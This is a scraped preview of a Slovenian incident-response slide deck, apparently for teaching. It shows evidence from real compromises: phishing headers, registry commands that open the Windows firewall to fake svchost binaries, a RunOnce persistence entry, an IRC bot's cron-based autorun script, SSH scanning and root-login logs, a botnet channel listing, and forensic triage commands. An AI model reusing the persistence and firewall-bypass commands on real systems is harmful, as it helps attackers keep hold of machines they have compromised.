View
118
Download
2
Category
Preview:
DESCRIPTION
Nekaj primerov obravanavanih varnostnih incidentov na internetu
Citation preview
Copyright Carnegie Mellon University
Daj človeku ukradeno kreditno kartico in bo en dan jedel kot kralj.Nauči ga kako se ribari, pa bo preskrbljen za življenje.
-- starodaven nigerijski pregovor
Received: from [98.139.xxx.xxx] by web141006.mail.bf1.yahoo.com via HTTP; Wed, 11 Apr 2012 12:15:40 PDTX-Mailer: YahooMailWebService/0.8.117.340979References: <1333964698.56162.YahooMailNeo@web141005.mail.bf1.yahoo.com> <1333964778.34343.YahooMailNeo@web141001.mail.bf1.yahoo.com> <1333964865.49465.YahooMailNeo@web141004.mail.bf1.yahoo.com> <1333964990.45879.YahooMailNeo@web141003.mail.bf1.yahoo.com> <1333965126.47512.YahooMailNeo@web141003.mail.bf1.yahoo.com> <1333965576.34205.YahooMailNeo@web141001.mail.bf1.yahoo.com> <1333965781.74493.YahooMailNeo@web141005.mail.bf1.yahoo.com> <1333965883.95604.YahooMailNeo@web141006.mail.bf1.yahoo.com> <1333966100.81116.YahooMailNeo@web141004.mail.bf1.yahoo.com> <1333966284.12608.YahooMailNeo@web141002.mail.bf1.yahoo.com> <1333966541.81116.YahooMailNeo@web141004.mail.bf1.yahoo.com> <1333966617.34414.YahooMailNeo@web141001.mail.bf1.yahoo.com> <1333966670.88285.YahooMailNeo@web141004.mail.bf1.yahoo.com> <1333966816.85842.YahooMailNeo@web141006.mail.bf1.yahoo.com> <1333968605.76830.YahooMailNeo@web141003.mail.bf1.yahoo.com> <1333968944.99197.YahooMailNeo@web141002.mail.bf1.yahoo.com> <1333969055.16421.YahooMailNeo@web141005.mail.bf1.yahoo.com> <1333969203.18144.YahooMailNeo@web141005.mail.bf1.yahoo.com> <1333969409.27611.YahooMailNeo@web141006.mail.bf1.yahoo.com> <1333969499.38548.YahooMailNeo@web141006.mail.bf1.yahoo.com> <1333969533.98850.YahooMailNeo@web141004.mail.bf1.yahoo.com> <1333969617.82064.YahooMailNeo@web141001.mail.bf1.yahoo.com> <1333969837.16102.YahooMailNeo@web141005.mail.bf1.yahoo.com> <1333970999.36974.YahooMailNeo@web141006.mail.bf1.yahoo.com> <1333971076.45397.YahooMailNeo@web141002.mail.bf1.yahoo.com> <1333971331.18898.YahooMailNeo@web141003.mail.bf1.yahoo.com> <1333976214.9952.YahooMailNeo@web141006.mail.bf1.yahoo.com> <1333978671.78505.YahooMailNeo@web141003.mail.bf1.yahoo.com>Message-ID: <1334171740.94092.YahooMailNeo@web141006.mail.bf1.yahoo.com>Date: Wed, 11 Apr 2012 12:15:40 -0700 (PDT)From: Xxxx Xxxxx <xxxx.xxxxx@yahoo.com>Reply-To: Xxxx Xxxxx <xxxx.xxxxx@yahoo.com>Subject: =?utf-8?B?Rnc6IGZpbmFuxI1uYSBrYXJ0aWNhICggcmHEjXVub3ZvZHNrYSBzbHXFvmJh?= =?utf-8?B?KQ==?=To: "xxxxxx.xxxxx@xxxxx.si"Cc: xxxxx.xxxx@siol.netIn-Reply-To: <1333978671.78505.YahooMailNeo@web141003.mail.bf1.yahoo.com>
Operation: Process CreateResult: SUCCESSCommand line: "C:\Program Files\SumatraPDF\SumatraPDF.exe" "C:\Documents and Settings\tt\Application Data\navodila_pogodba_ePOBOT_AJPES.pdf"
cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v "DoNotAllowExceptions" /t REG_DWORD /d "0" /f cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v "C:\Documents and Settings\user\Application Data\svchost.exe" /t REG_SZ /d "C:\Documents and Settings\user\Application Data\svchost.exe:*:Enabled:Windows Messanger" /f cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v "C:\Documents and Settings\user\Application Data\Svchost32.exe" /t REG_SZ /d "C:\Documents and Settings\user\Application Data\Svchost32.exe:*:Enabled:Windows Messanger" /f
"HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" + "IeXplorer32" "C:\Users\User\AppData\Roaming\Prometna_Kartica_Apr2012.exe"
$ whois 178.172.xxx.xxx
inetnum: 178.172.xxx.0 - 178.172.xxx.255netname: ARNES-NETdescr: Academic and Research Network of Sloveniadescr: Ljubljanadescr: Slovenia
# netstat -anpt | more ... 178.172.xxx.xxx:44947 178.17.86.40:22 SYN_SENT - 178.172.xxx.xxx:40448 178.17.86.42:22 SYN_SENT - 178.172.xxx.xxx:47351 178.17.86.35:22 SYN_SENT - 178.172.xxx.xxx:57112 178.17.85.142:22 SYN_SENT - 178.172.xxx.xxx:44947 178.17.86.48:22 SYN_SENT - 178.172.xxx.xxx:40448 178.17.86.242:22 SYN_SENT - 178.172.xxx.xxx:47351 178.17.86.135:22 SYN_SENT - 178.172.xxx.xxx:57112 178.17.85.12:22 SYN_SENT - 178.172.xxx.xxx:44947 178.17.86.50:22 SYN_SENT - 178.172.xxx.xxx:40448 178.17.86.92:22 SYN_SENT - 178.172.xxx.xxx:47351 178.17.86.25:22 SYN_SENT - 178.172.xxx.xxx:57112 178.17.85.122:22 SYN_SENT - ...
# netstat -anpt | more ...178.172.xxx.xxx:48174 208.83.20.130:6667 ESTABLISHED 5472/-bash178.172.xxx.xxx:57221 194.109.20.90:6667 ESTABLISHED 5472/-bash 178.172.xxx.xxx:34110 195.197.175.21:7000 ESTABLISHED 5472/-bash...
$ dig –x 208.83.20.130
130.20.83.208.in-addr.arpa. 195 IN PTR Tampa.FL.US.Undernet.org.90.20.109.194.in-addr.arpa. 86400 IN PTR undernet.xs4all.nl.21.175.197.195.in-addr.arpa. 14400 IN PTR irc2.saunalahti.fi.
# lsof -np 5472...-bash 5472 root txt REG 8,1 35352 /var/spool/samba/.bash/-bash...
# file /var/spool/samba/.bash/*./autorun: POSIX shell script text executable./-bash: ELF 32-bit LSB executable, Intel 80386, version./cron.d: ASCII text./cyc.acc: ASCII text./cyc.hold: a /usr/bin/perl script text executable./cyc.pid: ASCII text./cyc.session: ASCII text./cyc.set: ASCII English text./go: ASCII text./mech.dir: ASCII text./m.help: data./pico: ELF 32-bit LSB executable, Intel 80386, version 1./run: POSIX shell script text executable./stealth: ELF 32-bit LSB executable, Intel 80386, version 1./update: POSIX shell script text executable
$ cat /var/spool/samba/.bash/autorun#!/bin/shpwd > mech.dirdir=$(cat mech.dir)echo "* * * * * $dir/update >/dev/null 2>&1" > cron.dcrontab cron.d && perl cyc.holdcrontab -l | grep updateecho "#!/bin/shif test -r $dir/cyc.pid; then pid=\$(cat $dir/cyc.pid)if \$(kill -CHLD \$pid >/dev/null 2>&1); then exit 0fificd $dirrm -rf cyc.hold./run &>/dev/null" > updatechmod u+x update
$ grep Accepted secureMay 4 11:29:09 spxxxxx sshd[22429]: Accepted password for bxxx from 193.2.xxx.xxx port 60429 ssh2May 4 11:29:52 spxxxxx sshd[22453]: Accepted password for bxxx from 193.2.xxx.xxx port 60438 ssh2May 4 11:56:45 spxxxxx sshd[22697]: Accepted password for root from 209.172.51.39 port 48792 ssh2May 4 16:05:46 spxxxxx sshd[23079]: Accepted password for root from 79.118.61.94 port 1079 ssh2May 4 18:05:39 spxxxxx sshd[17116]: Accepted password for root from 14.63.213.191 port 48309 ssh2May 5 10:42:35 spxxxxx sshd[22874]: Accepted password for root from 202.199.160.210 port 40019 ssh2May 5 11:52:38 spxxxxx sshd[23117]: Accepted password for root from 86.124.223.6 port 2058 ssh2May 5 11:56:29 spxxxxx sshd[23184]: Accepted password for root from 86.124.223.6 port 2061 ssh2May 5 11:57:18 spxxxxx sshd[23197]: Accepted password for root from 86.124.223.6 port 2062 ssh2May 5 11:57:28 spxxxxx sshd[23204]: Accepted password for root from 86.124.223.6 port 2063 ssh2
Now talking on #xhack * Topic for #xhack is: ./a 178.17;./a 201.251;./a 195.76;./a 195.248;./a 81.211 129.25 128.32 144.30 134.50 * Topic for #xhack set by BaRoZ at Sun May 01 16:21:28 2011...<BaRoZ> nuf1f_ say a<BaRoZ> nuf1f_ say a<BaRoZ> +kb nuf1f_ * start__ sets ban on *!*userr@194.249.*.* > > * You have been kicked from #xhack by start__ (Requested Kick)
* /who #xhack* #xhack ~Fly 178.172.xxx.xxx *.undernet.org sasesase H :3 Powerd by move* #xhack ~Fly 124.82.70.197 *.undernet.org informati H@ :3 Powerd by move* #xhack ~Fly 121.241.77.194 *.undernet.org luccc H@ :3 Powerd by move* #xhack ~Fly biophys3.physics.usyd.edu.au *.undernet.org biophys3 H@ :3 Powerd by move* #xhack ~chattr 218.189.204.215 *.undernet.org DHL H@ :3 chattr* #xhack ~Fly 93-44-208-192.ip98.fastwebnet.it *.undernet.org valy____ H@ :3 Powerd by move* #xhack ~lolipop 182-166-5-237f1.shg1.eonet.ne.jp *.undernet.org part_ H@ :3 lolipop* #xhack ~lolipop Edd.users.undernet.org *.undernet.org valyca H@x :3 lolipop* #xhack ~luzar MService.users.undernet.org *.undernet.org VaLi H@x :3 luser* #xhack ~alpha 62.94.13.227 *.undernet.org vali__ H@ :3 omega* #xhack ~circ 82.193.22.182 *.undernet.org start__ H@ :3 circ* #xhack ~chattr 82.193.22.182 *.undernet.org start___ H@ :3 chattr* #xhack ~circ 122.99.166.142 *.undernet.org removed__ H@ :3 circ* #xhack ~Fly 80.82.17.151 *.undernet.org xHaCk H@ :3 Powerd by move* #xhack ~lolipop a83-161-134-137.adsl.xs4all.nl *.undernet.org valyca__ H@ :3 lolipop* #xhack ~circ a83-161-134-137.adsl.xs4all.nl *.undernet.org removed H@ :3 circ* #xhack ~chattr a83-161-134-137.adsl.xs4all.nl *.undernet.org moved H@ :3 chattr* #xhack ~circ 62.94.13.227 *.undernet.org VaLi_ H@ :3 circ* #xhack ~lolipop 82.193.22.182 *.undernet.org start_ H@ :3 lolipop* #xhack ~lolipop 190.114.224.11 *.undernet.org valyca_ H@ :3 lolipop* #xhack ~chattr 122.99.166.142 *.undernet.org VaLy___ H@ :3 chattr* #xhack ~circ 190.114.224.11 *.undernet.org removed_ H@ :3 circ* #xhack ~VaLy hax0r.users.undernet.org *.undernet.org BaRoZ H@x :3 VaLy* #xhack ~Aly 50.16.26.202 *.undernet.org gzip H@ :3 Powerd by move* #xhack ~chattr 190.114.224.11 *.undernet.org moved_ H@ :3 chattr* #xhack ~UK mail.pjsind.co.uk *.undernet.org part____ H@ :3 Powerd by move* #xhack ~circ Ezl.users.undernet.org *.undernet.org valentin H@x :3 circ* #xhack ~bursuc sd-23267.dedibox.fr *.undernet.org VaLy_ H@ :3 Powerd by move* #xhack ~lolipop 122.99.166.142 *.undernet.org valyca___ H@ :3 lolipop* #xhack ~Fly 88.191.129.21 *.undernet.org Valeriu H@ :3 Powerd by move* #xhack ~Fly 46.28.110.179 *.undernet.org pizdel H@ :3 Powerd by move* #xhack ~Kitty xray426.server4you.de *.undernet.org move H@ :3 Powerd by move* #xhack ~Fly v-182-163-56-103.ub-freebit.net *.undernet.org valy_____ H@ :3 Powerd by move* #xhack ~chattr 182-166-5-237f1.shg1.eonet.ne.jp *.undernet.org cUc H@ :3 chattr* #xhack :End of /WHO list.
# find / -ctime -10 –print # ps –ef# find / -mtime -5 –ls # lsof –np PID# find / -amin -120 –print # lsof –ni TCP:22# stat somefile # pstree -aAp# cat .bash_history # last -i# ls –la # file somefile.bin# ls –lct # strings somefile.bin# ls –l /proc/PID/# chkrootkit# rkhunter
Recommended